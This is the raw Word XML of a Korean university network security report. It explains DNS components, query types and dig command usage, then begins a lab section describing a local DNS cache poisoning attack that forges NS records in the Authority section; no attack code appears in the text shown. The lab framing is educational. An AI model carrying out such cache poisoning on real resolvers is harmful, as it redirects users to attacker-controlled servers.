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331E622B" w14:textId="2CCDAF53" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">2024년도 </w:t>
      </w:r>
      <w:r w:rsidR="00F10630">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>학기 네트워크보안: 최종 보고서</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA3269E" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">학번: 20221095 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0D6858" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>이름: 민현선</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2576C9" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRPr="00F10630" w:rsidRDefault="00E65B3A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B4AB044" w14:textId="7845190C" w:rsidR="00E65B3A" w:rsidRPr="00F10630" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US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>1.</w:t>
      </w:r>
      <w:r w:rsidR="00F10630">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US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DNS의 개념 및 동작 원리 조사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br/>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Domain Name Space, Name Server, Resolver 등의 개념 포함</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B592A31" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00E65B3A"/>
    <w:p w14:paraId="26B4A5FE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DNS의 개념 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>DNS는 ‘Domain Name System’의 약자로, 사람이 이해하기 쉬운 도메인 이름(예: ‘www.naver.com’)을 컴퓨터가 이해할 수 있는 IP 주소(예: ‘192.168.0.1’)로 변환해주는 시스템이다. 인터넷 상에서 특정 서버에 접근하려면 IP 주소가 필요하지만, 이를 기억하기 어려워 도메인 이름을 사용하게 된다. DNS는 이러한 도메인 이름을 올바른 IP 주소로 변환하는 역할을 한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B50D56A" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00E65B3A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67184309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DNS 동작 원리 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>1) 사용자가 웹 브라우저에 도메인 이름(예: ‘www.naver.com’)을 입력한다.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>2) Resolver가 DNS 조회를 시작하며, 우선 로컬 캐시에서 IP 주소를 확인한다.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>3) 로컬 캐시에 없으면 Recursive Query를 통해 DNS 서버로 요청을 보낸다.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>4) 다음과 같은 순서로 DNS 서버가 차례로 IP 주소를 찾는다:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">- Root Name Server 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2D7D4328" wp14:editId="39861C57">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>4067175</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>114300</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1881188" cy="1185000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone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118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D08FF4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 Top-Level Domain (TLD) Name Server (예: ‘.com’ 서버)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>- Authoritative Name Server (예: ‘naver.com’의 네임 서버)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>5) 최종적으로 IP 주소를 찾으면, Resolver가 이를 브라우저에 전달하여 사용자가 원하는 웹사이트에 접속한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642F5BC1" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00E65B3A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07DFEC55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0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DNS 주요 구성 요소</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>1) Domain Name Space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347A3DF7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 도메인 이름 공간은 도메인 이름을 체계적으로 계층화한 구조이다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A7F257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 각 도메인은 계층적 트리 구조를 가지며, 루트에서부터 최하위 도메인까지 구성된다.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  예: ‘www.naver.com’에서 ‘com’은 최상위 도메인(Top-Level Domain(TLD)), ‘naver’은 2차 도메인, ‘www’는 하위 도메인이다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5608C3A1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 도메인 이름은 오른쪽에서 왼쪽으로 갈수록 계층이 낮아진다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2945D108" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00E65B3A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7670D5B4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>2) Name Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>DNS 조회 요청을 처리하고, 도메인 이름에 대한 IP 주소 정보를 제공하는 서버이다. 네임 서버는 여러 종류가 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C34443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 Root Name Server: 최상위 계층으로, TLD 네임 서버의 위치를 알려준다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1EB182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 TLD Name Server: ‘.com’, ‘.org’, ‘.net’과 같은 최상위 도메인 정보를 담당한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038C82AD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 Authoritative Name Server: 특정 도메인에 대한 최종 IP 주소 정보를 가지고 있는 서버이다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407DCE09" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00E65B3A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35560909" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>3) Resolver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A568F9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 DNS 클라이언트 역할을 하며, 사용자의 DNS 조회 요청을 처리하는 소프트웨어이다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B8F5F8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 운영 체제의 네트워크 라이브러리나 ISP에서 제공되며, 주로 Recursive Query를 수행하여 최종 IP 주소를 반환한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C0F8F1" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00E65B3A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="141B2B31" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/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0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DNS 주요 쿼리</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7154B104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1) Recursive Query(재귀적 커리): Resolver가 필요한 IP 주소를 찾을 때까지 여러 DNS 서버에 연속적으로 요청을 보내는 방식이다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5917EBD3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2) terative Query(반복적 쿼리): DNS 서버가 자신이 알고 있는 가장 가까운 정보만 반환하며 나머지는 Resolver가 직접 다른 DNS 서버에 문의한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BEE3C9" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00E65B3A"/>
    <w:p w14:paraId="0735393D" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00E65B3A"/>
    <w:p w14:paraId="1FE19AE0" w14:textId="618733AD" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr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>2. dig (Domain Information Groper) 명령어의 사용법과 예시 조사</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFF4251" w14:textId="77777777" w:rsidR="00E65B3A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*사용 방법, 사용 옵션 등 포함</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579FE714" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dig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: DNS 정보를 조회하는 도구이다. 주요 옵션과 레코드 타입을 활용해 다양한 DNS 정보를 확인할 수 있다. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C70D950" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00E65B3A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="004D8CE3" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/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0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>기본 사용법</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A228422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  <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>dig [옵션] [도메인 이름] [레코드 타입]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5933D183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 옵션: 추가 설정</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F9698E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- 도메인 이름: 조회할 도메인 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025333B2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 레코드 타입: 조회할 DNS 레코드 유형 (기본값: ‘A’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF2F59A" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00E65B3A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FC4E8CB" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/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0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>주요 옵션</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a6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65"/>
        <w:gridCol w:w="2700"/>
        <w:gridCol w:w="3435"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E65B3A" w14:paraId="5EA4D9CB" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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3880A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1) +short: 간단한 IP 출력 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E26CEBC" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="yellow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예: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>dig example.com +short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5D9BD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2) +trace:DNS 경로 추적 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="440F0086" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="yellow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lastRenderedPageBreak/>
              <w:t xml:space="preserve">예: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>dig example.com +trace</w:t>
            </w:r>
          </w:p>
        </w:tc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3FEDB" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="yellow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lastRenderedPageBreak/>
              <w:t xml:space="preserve">3) @네임서버: 특정 네임서버 지정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br/>
              <w:t xml:space="preserve">예: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>dig @8.8.8.8 example.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E65B3A" w14:paraId="6B9BEEC1" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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43076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4) -t [레코드 타입]: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br/>
              <w:t xml:space="preserve">레코드 타입 지정 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54041866" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="yellow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예: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>dig -t MX example.com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8F2B9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5) -x [IP 주소]:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09F46BBE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역방향 DNS 조회 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00D604E9" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="yellow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예: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>dig -x 8.8.8.8</w:t>
            </w:r>
          </w:p>
        </w:tc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70A8E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6) +noall +answer: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br/>
              <w:t xml:space="preserve">응답 섹션만 표시 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30ACADFF" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="yellow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예: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>dig example.com +noall +answer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="582365E0" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00E65B3A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="610818EA" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00E65B3A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EB0C159" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00E65B3A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DF61BDF" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/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0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>주요 DNS 레코드 타입</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a7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45"/>
        <w:gridCol w:w="2655"/>
        <w:gridCol w:w="3000"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E65B3A" w14:paraId="54AA9E9D" w14:textId="77777777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7F7C0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1) A: IPv4 주소 레코드 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4208745D" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="yellow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예: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>dig example.com A</w:t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4F80A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2) AAAA: IPv6 주소 레코드 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="118C72D3" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="yellow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예: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>dig example.com AAAA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DBE4D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3) MX: 메일 서버 레코드 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="141A6BEA" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="yellow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예: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>dig example.com MX</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E65B3A" w14:paraId="5165734C" w14:textId="77777777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3C620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4) CNAME: 별칭 레코드 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30249257" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="yellow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예: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>dig www.example.com CNAME</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="060EEFD9" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00E65B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3FBF4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5) NS: 네임서버 레코드 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47B561E2" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="yellow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예: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>dig example.com NS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1478F551" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00E65B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7F293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6) TXT: 텍스트 레코드 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51D1DC8D" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="yellow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예: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>dig example.com TXT</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B06DD51" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00E65B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</w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C0502A7" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00E65B3A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2743848E" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00E65B3A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="644104CA" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00E65B3A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D61A4FB" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00E65B3A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="160304BB" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00E65B3A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CD941B8" w14:textId="5E28E287" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr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>3. (Local) DNS Cache Poisoning Attack: Authority Section 감염</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BAE3C6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*reference1 파일 참고(Task 3: Spoofing NS Records)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC0D1AF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*Sample 코드 활용</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19390D9A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*공격 실행 및 결과 설명을 위한 일부 코드를 (필요시) 첨부하고 전체 코드는 부록에 첨부</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCB9D7E" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00E65B3A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A65CEBA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0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DNS Cache Poisoning Attack: Authority Section 감염 공격 설명</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB89B3F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이 공격의 목적은 로컬 DNS 서버의 캐시에 잘못된 네임서버(NS) 정보를 저장시켜, 사용자들이 특정 도메인에 접근할 때 공격자가 지정한 네임서버를 사용하게 만드는 것이다. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B28AC61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공격 코드는 DNS 쿼리를 가로채고, 가짜 DNS 응답을 생성하여 보낸다. 이때, Authority Section에 공격자가 제어하는 네임서버 정보를 포함시킨다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126A060B" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00E65B3A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="087690C4" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRPr="00F10630" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
